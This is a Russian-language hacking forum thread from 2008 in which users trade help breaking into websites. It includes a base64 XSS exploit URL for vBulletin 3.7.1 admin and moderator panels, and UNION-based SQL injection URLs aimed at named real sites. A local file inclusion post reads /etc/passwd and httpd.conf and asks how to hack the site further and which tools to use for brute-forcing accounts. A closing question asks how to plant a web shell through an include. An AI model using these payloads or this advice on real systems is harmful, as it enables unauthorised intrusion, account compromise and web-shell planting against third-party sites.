11.08.2008, 15:07
|
|
Новичок
Регистрация: 08.07.2008
Сообщений: 5
С нами:
9390384
Репутация:
0
|
|
vbulletin 3.7.1
XSS-base64
_http://securityvulns.ru/news/CGI/2008.06.14.html
_http://securityvulns.ru/news/CGI/2008.06.19.html
Exploit: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
Помогите разобраться как использовать данную XSS заранее спс.
Последний раз редактировалось TehRn; 11.08.2008 в 15:13..
|
|
|
11.08.2008, 20:52
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
2TehRn собственно ф чем проблема то ?
"PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>"  собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай |
|
|
|
11.08.2008, 20:53
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами:
10016425
Репутация:
1257
|
|
Подобрал количество полей. всё гуд, ошибки нету, но и ничего не выводит. где трабл?
http://test.livani.lv/lat/aktualitates/aktualitates/?doc=55555551661+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14/*
Последний раз редактировалось mr.The; 11.08.2008 в 21:04..
|
|
|
|
11.08.2008, 21:07
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
2mr.The если мне зрение не изменяет тама нету полей для вывода один выход слепая иньекция |
|
|
|
11.08.2008, 21:24
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами:
10016425
Репутация:
1257
|
|
2MaSTeR GэN
и на том спасибо. а я думал туплю где-т
|
|
|
|
11.08.2008, 23:57
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
С нами:
10157371
Репутация:
1
|
|
подцепил локальным инклудом файлы
/etc/passwd
etc/httpd/conf/httpd.conf
нашёл файл
phpinfo.php
из httpd.conf видно, что на хостинге есть ещё сайты. такая запись:
<VirtualHost *:80>
ServerAdmin mail@gmail.com
DocumentRoot /home/SITENAME/public_html
ServerName www.SITENAME.com
ServerAlias SITENAME.com
ErrorLog /dev/null
CustomLog /dev/null common
SetOutputFilter DEFLATE
DeflateFilterNote ratio
SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.pdf$ no-gzip dont-vary
ExpiresActive On
<Directory /home/SITENAME/public_html>
AllowOverride All
ExpiresByType application/x-shockwave-flash A0
ExpiresByType text/javascript A2419200
ExpiresByType text/plain A2419200
ExpiresByType text/html A300
ExpiresByType text/css A2419200
ExpiresByType image/gif A2419200
ExpiresByType image/jpeg A2419200
ExpiresByType image/png A2419200
</Directory>
</VirtualHost>
но приинклудить из них ничего не получается. видимо, такие настройки.
логов не нашёл =/
Загружать никаких файлов туда нельзя.
что мне можно сделать, чтобы хакнуть этот сайт?
По поводу /etc/passwd, знаю что брутят по маске Логин:Логин фтп, ссх. Скажите пожалуйста, какими брутфорсами это можно провернуть, кроме Гидры, не дружу с ней. |
|
|
|
12.08.2008, 00:07
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
ServerName www.SITENAME.com
)
но приинклудить из них ничего не получается. видимо, такие настройки.
такого сайта нет вот и не получается проинклудить SITENAME.com )
|
|
|
|
12.08.2008, 00:18
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
С нами:
10157371
Репутация:
1
|
|
нет нет. Это я изменил имя, дабы не светить сервер
|
|
|
|
12.08.2008, 00:58
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами:
9618766
Репутация:
5
|
|
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию
|
|
|
|
12.08.2008, 02:38
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
С нами:
9492068
Репутация:
46
|
|
Не знал куда написать. Решил сюда.
Проблема с заливкой шелла. Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется... Пробовал в .htaccess прописать AddType application/force-open .php - не помогло, как видите... на холме открывается загрузка файла, на сайте с инклюдом - каракули... Подскажите что путевое в htaccess прописать чтоб пахало  |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
